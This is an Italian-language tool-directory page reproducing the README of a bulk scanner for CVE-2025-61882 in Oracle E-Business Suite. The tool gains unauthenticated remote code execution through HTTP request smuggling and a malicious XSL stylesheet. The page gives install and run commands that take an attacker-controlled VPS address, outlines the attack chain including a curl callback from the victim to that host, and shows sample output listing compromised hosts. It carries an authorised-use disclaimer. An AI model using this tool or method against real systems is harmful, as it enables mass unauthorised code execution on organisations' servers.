Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-61882 — Scanner multi-thread per CVE-2025-61882 in Oracle E-Business Suite, che sfrutta lo smuggling di richieste HTTP per ottenere esecuzione remota di codice non autenticata e validarla tramite l'output dei comandi. | Kitploit
Strumenti/GitHubGitHub/sachinart/cve-2025-61882
RicognizioneScanner di VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubsachinart/cve-2025-61882

CVE-2025-61882

Scanner multi-thread per CVE-2025-61882 in Oracle E-Business Suite, che sfrutta lo smuggling di richieste HTTP per ottenere esecuzione remota di codice non autenticata e validarla tramite l'output dei comandi.

Vedi Repository
11710 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Scanner RCE per Oracle E-Business Suite (CVE-2025-61882)

Uno scanner bulk veloce e multi-thread per rilevare CVE-2025-61882 nelle installazioni di Oracle E-Business Suite. Questa vulnerabilità critica consente l'esecuzione remota di codice non autenticata.

Python Version License CVE

🎯 Funzionalità

  • Scansione Bulk - Elabora centinaia o migliaia di target da un file
  • Multi-thread - Scansione concorrente configurabile (predefinito: 20 thread)
  • Rilevamento Automatico - Valida l'RCE eseguendo il comando id e analizzando l'output
  • Risultati in Tempo Reale - I target vulnerabili vengono scritti immediatamente in vuln-output.txt
  • Porte Casuali - Utilizza porte casuali (2000-9999) per ogni target per evitare conflitti
  • Output Pulito - Monitoraggio dell'avanzamento con rumore minimo

📋 Requisiti

root@kitploit:~
pip install requests

Tutto qui. Basta Python 3.7+ e la libreria requests.

🚀 Installazione

root@kitploit:~
git clone https://github.com/Sachinart/CVE-2025-61882.git
cd CVE-2025-61882
pip install -r requirements.txt

💻 Utilizzo

Scansione di Base

root@kitploit:~
python3 cve-2025-61882.py --targets targets.txt --lhost IP_DEL_TUO_VPS

Scansione Veloce (50 thread)

root@kitploit:~
python3 cve-2025-61882.py --targets targets.txt --lhost IP_DEL_TUO_VPS --threads 50

Scansione Conservativa (10 thread)

root@kitploit:~
python3 cve-2025-61882.py --targets targets.txt --lhost IP_DEL_TUO_VPS --threads 10

📝 Formato del File dei Target

Crea un file targets.txt con un URL per riga:

root@kitploit:~
http://oracle-ebs1.example.com:8000
https://oracle-ebs2.example.com:443
http://192.168.1.100:8001
https://apps.company.com

📊 Esempio di Output

root@kitploit:~
╔═══════════════════════════════════════════════════════════════╗
║   Oracle E-Business Suite RCE Scanner (CVE-2025-61882)       ║
╚═══════════════════════════════════════════════════════════════╝

[*] Caricati 1235 target dal file
[*] Esecuzione con 20 thread concorrenti
[*] Gli host vulnerabili verranno salvati in vuln-output.txt

[*] [1/1235] Verifica di https://target1.com:443 sulla porta 7893
[*] [2/1235] Verifica di https://target2.com:443 sulla porta 5882

[+] Trovato! 129.146.56.43 è vulnerabile
[+] Output del comando: uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)

=================================================================
[*] Scansione completata in 245.67 secondi
[*] Trovati 3 target vulnerabili
[*] Controlla vuln-output.txt per i risultati completi
=================================================================

[+] Target vulnerabili trovati:

    129.146.56.43 → uid=54321(oracle) gid=54321(oinstall)
    192.168.1.50 → uid=1000(applmgr) gid=1000(dba)
    10.0.0.100 → uid=500(oracle) gid=500(oinstall)

📄 File di Output

I risultati vengono salvati in vuln-output.txt:

root@kitploit:~
# Oracle EBS CVE-2025-61882 - Risultati della Scansione
# Iniziata: Tue Oct 07 15:30:45 2025
# Totale target: 1235
# Scanner di: Chirag Artani

129.146.56.43 | uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
192.168.1.50 | uid=1000(applmgr) gid=1000(dba) groups=1000(dba)
10.0.0.100 | uid=500(oracle) gid=500(oinstall) groups=500(oinstall)

🔍 Come Funziona

  1. Recupero Token CSRF - Recupera un token CSRF valido dal target
  2. HTTP Request Smuggling - Sfrutta la vulnerabilità di smuggling per iniettare il payload dannoso
  3. Consegna Payload XSL - Fornisce il foglio di stile XSL dannoso che esegue i comandi
  4. Validazione Callback - Il target esegue il comando id e invia l'output tramite curl
  5. Corrispondenza Regex - Valida l'RCE riuscito verificando il pattern uid=...gid=...

⚙️ Configurazione

🔒 Divulgazione Responsabile

Questo strumento è destinato esclusivamente a test di sicurezza autorizzati. Ricorda sempre:

  • ✅ Ottieni un'autorizzazione scritta prima di testare
  • ✅ Scansiona solo sistemi di tua proprietà o per cui hai esplicita autorizzazione
  • ✅ Segnala i risultati in modo responsabile alle organizzazioni interessate
  • ✅ Segui le pratiche di divulgazione coordinata delle vulnerabilità
  • ❌ Non utilizzare mai questo strumento su sistemi non autorizzati

L'accesso non autorizzato a sistemi informatici è illegale.

🐛 Problemi Noti

  • Alcuni target potrebbero andare in timeout a causa del blocco da firewall/IDS
  • Il rilevamento del callback richiede che il target raggiunga il tuo VPS su porte casuali
  • Gli avvisi sui certificati SSL vengono soppressi (previsto per i test di penetrazione)

🤝 Contributi

Hai trovato un bug? Hai una richiesta di funzionalità?

  1. Fai un fork del repository
  2. Crea il tuo branch per la funzionalità (git checkout -b feature/funzionalita-straordinaria)
  3. Committa le tue modifiche (git commit -m 'Aggiungi una funzionalità')
  4. Pusha sul branch (git push origin feature/funzionalita-straordinaria)
  5. Apri una Pull Request

📜 Licenza

Questo progetto è concesso in licenza sotto la MIT License - consulta il file LICENSE per i dettagli.

⚠️ Disclaimer

Questo strumento è fornito esclusivamente per scopi educativi e di test di sicurezza autorizzati. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento. Usalo a tuo rischio.

📚 Riferimenti

  • Dettagli CVE-2025-61882
  • Oracle Critical Patch Update

👨‍💻 Sviluppato da Chirag Artani

Sito Web • Twitter • LinkedIn

Realizzato con ❤️ per la community infosec

Scarica lo strumento
ArgomentoObbligatorioPredefinitoDescrizione
--targetsSì-Percorso del file contenente gli URL dei target
--lhostSì-Indirizzo IP del tuo VPS/attaccante
--threadsNo20Numero di thread concorrenti